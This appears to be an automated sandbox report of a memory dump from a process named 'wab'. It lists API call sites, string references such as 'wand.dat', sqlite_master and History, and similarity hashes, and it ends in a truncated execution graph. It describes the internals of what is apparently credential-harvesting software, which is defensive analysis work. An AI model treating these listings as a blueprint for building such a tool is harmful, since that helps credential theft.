                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastMessage_snwprintf
                    • String ID: Error$Error %d: %s
                    • API String ID: 313946961-1552265934
                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: foreign key constraint failed$new$oid$old
                    • API String ID: 0-1953309616
                    Strings
                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                    Similarity
                    • API ID: memcpy
                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                    • API String ID: 3510742995-272990098
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 00417497
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                    • malloc.MSVCRT ref: 004174BD
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                    Similarity
                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                    • String ID:
                    • API String ID: 2903831945-0
                    APIs
                    • GetParent.USER32(?), ref: 0040D453
                    • GetWindowRect.USER32(?,?), ref: 0040D460
                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • memset.MSVCRT ref: 004450CD
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    Similarity
                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                    • String ID:
                    • API String ID: 1471605966-0
                    APIs
                    • wcscpy.MSVCRT ref: 0044475F
                    • wcscat.MSVCRT ref: 0044476E
                    • wcscat.MSVCRT ref: 0044477F
                    • wcscat.MSVCRT ref: 0044478E
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                    Similarity
                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                    • String ID: \StringFileInfo\
                    • API String ID: 102104167-2245444037
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    Similarity
                    • API ID: memcpy$??3@
                    • String ID: g4@
                    • API String ID: 3314356048-2133833424
                    Similarity
                    • API ID: _memicmpwcslen
                    • String ID: @@@@$History
                    • API String ID: 1872909662-685208920
                    APIs
                    • memset.MSVCRT ref: 004100FB
                    • memset.MSVCRT ref: 00410112
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 00410141
                    Similarity
                    • API ID: memset$_snwprintf_wcslwrwcscpy
                    • String ID: </%s>
                    • API String ID: 3400436232-259020660
                    APIs
                    • memset.MSVCRT ref: 0040D58D
                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                    Similarity
                    • API ID: ChildEnumTextWindowWindowsmemset
                    • String ID: caption
                    • API String ID: 1523050162-4135340389
                    APIs
                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                    • String ID: MS Sans Serif
                    • API String ID: 210187428-168460110
                    Similarity
                    • API ID: ClassName_wcsicmpmemset
                    • String ID: edit
                    • API String ID: 2747424523-2167791130
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID: SHAutoComplete$shlwapi.dll
                    • API String ID: 3150196962-1506664499
                    Similarity
                    • API ID: memcpy$memcmp
                    • String ID:
                    • API String ID: 3384217055-0
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    APIs
                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                    • GetMenu.USER32(?), ref: 00410F8D
                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                    Similarity
                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                    • String ID:
                    • API String ID: 1889144086-0
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                    • GetLastError.KERNEL32 ref: 0041810A
                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastMappingView
                    • String ID:
                    • API String ID: 1661045500-0
                    APIs
                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                    • memcpy.MSVCRT ref: 0042EC7A
                    Strings
                    • virtual tables may not be altered, xrefs: 0042EBD2
                    • sqlite_altertab_%s, xrefs: 0042EC4C
                    • Cannot add a column to a view, xrefs: 0042EBE8
                    Similarity
                    • API ID: memcpymemset
                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                    • API String ID: 1297977491-2063813899
                    APIs
                    • memset.MSVCRT ref: 0040560C
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.*$dat$wand.dat
                    • API String ID: 2618321458-1828844352
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • wcslen.MSVCRT ref: 00410C74
                    • _wtoi.MSVCRT ref: 00410C80
                    • _wcsicmp.MSVCRT ref: 00410CCE
                    • _wcsicmp.MSVCRT ref: 00410CDF
                    Similarity
                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                    • String ID:
                    • API String ID: 1549203181-0
                    APIs
                    • memset.MSVCRT ref: 00412057
                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                    • GetKeyState.USER32(00000010), ref: 0041210D
                    Similarity
                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                    • String ID:
                    • API String ID: 3550944819-0
                    APIs
                    • wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • memcpy.MSVCRT ref: 0040A94F
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    APIs
                    • wcslen.MSVCRT ref: 0040B1DE
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                    • memcpy.MSVCRT ref: 0040B248
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    APIs
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    APIs
                    • strlen.MSVCRT ref: 0040B0D8
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                    • memcpy.MSVCRT ref: 0040B159
                    Similarity
                    • API ID: ??3@$memcpy$mallocstrlen
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 004144E7
                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                    • memset.MSVCRT ref: 0041451A
                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                    Similarity
                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                    • String ID:
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: sqlite_master
                    APIs
                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                    • wcscpy.MSVCRT ref: 00414DF3
                    Similarity
                    • API ID: BrowseFolderFromListMallocPathwcscpy
                    • String ID:
                    APIs
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • _snwprintf.MSVCRT ref: 00410FE1
                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • _snwprintf.MSVCRT ref: 0041100C
                    • wcscat.MSVCRT ref: 0041101F
                    Similarity
                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                    • String ID:
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                    • malloc.MSVCRT ref: 00417459
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                    • RegisterClassW.USER32(?), ref: 00412428
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                    Similarity
                    • API ID: HandleModule$ClassCreateRegisterWindow
                    • String ID:
                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00409B40
                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                    Similarity
                    • API ID: MessageSend$Item
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 00417B7B
                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                    • GetLastError.KERNEL32 ref: 00417BB5
                    Similarity
                    • API ID: File$ErrorLastLockUnlockmemset
                    • String ID:
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                    • malloc.MSVCRT ref: 00417407
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 0040F673
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                    • strlen.MSVCRT ref: 0040F6A2
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 0040F6E2
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                    • strlen.MSVCRT ref: 0040F70D
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 00402FD7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                    • strlen.MSVCRT ref: 00403006
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    APIs
                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                    • GetStockObject.GDI32(00000000), ref: 004143C6
                    Similarity
                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                    • String ID:
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                    Similarity
                    • API ID: Time$System$File$LocalSpecific
                    • String ID:
                    APIs
                    • memcpy.MSVCRT ref: 004134E0
                    • memcpy.MSVCRT ref: 004134F2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                    Similarity
                    • API ID: memcpy$DialogHandleModuleParam
                    • String ID:
                    APIs
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    APIs
                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                    Strings
                    Similarity
                    • API ID: InvalidateMessageRectSend
                    • String ID: d=E
                    APIs
                    • wcschr.MSVCRT ref: 0040F79E
                    • wcschr.MSVCRT ref: 0040F7AC
                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                    Strings
                    Similarity
                    • API ID: wcschr$memcpywcslen
                    • String ID: "
                    APIs
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • _memicmp.MSVCRT ref: 0040C00D
                    • memcpy.MSVCRT ref: 0040C024
                    Strings
                    Similarity
                    • API ID: FilePointer_memicmpmemcpy
                    • String ID: URL
                    APIs
                    Strings
                    Similarity
                    • API ID: _snwprintfmemcpy
                    • String ID: %2.2X
                    APIs
                    Strings
                    Similarity
                    • API ID: _snwprintf
                    • String ID: %%-%d.%ds
                    APIs
                    • memset.MSVCRT ref: 0040E770
                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                    Strings
                    Similarity
                    • API ID: MessageSendmemset
                    • String ID: F^@
                    • API String ID: 568519121-3652327722
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PlacementWindowmemset
                    • String ID: WinPos
                    • API String ID: 4036792311-2823255486
                    APIs
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 0040DCE9
                    • wcscat.MSVCRT ref: 0040DCFF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamewcscatwcsrchr
                    • String ID: _lng.ini
                    • API String ID: 383090722-1948609170
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                    • API String ID: 2773794195-880857682
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    APIs
                    • memcmp.MSVCRT ref: 00408AF3
                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                    • memcmp.MSVCRT ref: 00408B2B
                    • memcmp.MSVCRT ref: 00408B5C
                    • memcpy.MSVCRT ref: 00408B79
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID:
                    • API String ID: 231171946-0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcslen$wcscat$wcscpy
                    • String ID:
                    • API String ID: 1961120804-0

                    Execution Graph

                    Execution Coverage:2.3%
                    Dynamic/Decrypted Code Coverage:20.7%
                    Signature Coverage:0.5%
                    Total number of Nodes:835
                    Total number of Limit Nodes:17
40dd7b 51 API calls 33906 425d7c 16 API calls __fprintf_l 34097 43f6f0 25 API calls 34098 42db01 22 API calls 33907 412905 15 API calls __fprintf_l 34099 403b04 54 API calls 34100 405f04 SetDlgItemTextA GetDlgItemTextA 34101 44b301 ??3@YAXPAX 34104 4120ea 14 API calls 3 library calls 34105 40bb0a 8 API calls 34107 413f11 strcmp 33911 434110 17 API calls __fprintf_l 33913 425115 108 API calls __fprintf_l 34108 444b11 _onexit 33915 425115 76 API calls __fprintf_l 33918 429d19 10 API calls 34111 444b1f __dllonexit 34112 409f20 _strcmpi 33920 42b927 31 API calls 34115 433f26 19 API calls __fprintf_l 34116 44b323 FreeLibrary 34117 427f25 46 API calls 34118 43ff2b 17 API calls 34119 43fb30 19 API calls 33927 414d36 16 API calls 33929 40ad38 7 API calls 34121 433b38 16 API calls __fprintf_l 34122 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33933 426741 21 API calls 33934 40c5c3 125 API calls 33936 43fdc5 17 API calls 34123 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33939 4161cb memcpy memcpy memcpy memcpy 34128 43ffc8 18 API calls 33940 4281cc 15 API calls __fprintf_l 34130 4383cc 110 API calls __fprintf_l 33941 4275d3 41 API calls 34131 4153d3 22 API calls __fprintf_l 33942 444dd7 _XcptFilter 34136 4013de 15 API calls 34138 425115 111 API calls __fprintf_l 34139 43f7db 18 API calls 34142 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33945 4335ee 16 API calls __fprintf_l 34144 429fef 11 API calls 33946 444deb _exit _c_exit 34145 40bbf0 138 API calls 33949 425115 79 API calls __fprintf_l 34149 437ffa 22 API calls 33953 4021ff 14 API calls 33954 43f5fc 149 API calls 34150 40e381 9 API calls 33956 405983 40 API calls 33957 42b186 27 API calls __fprintf_l 33958 427d86 76 API calls 33959 403585 20 API calls 33961 42e58e 18 API calls __fprintf_l 33964 425115 75 API calls __fprintf_l 33966 401592 8 API calls 32906 410b92 32909 410a6b 32906->32909 32908 410bb2 32910 410a77 32909->32910 32911 410a89 GetPrivateProfileIntA 32909->32911 32914 
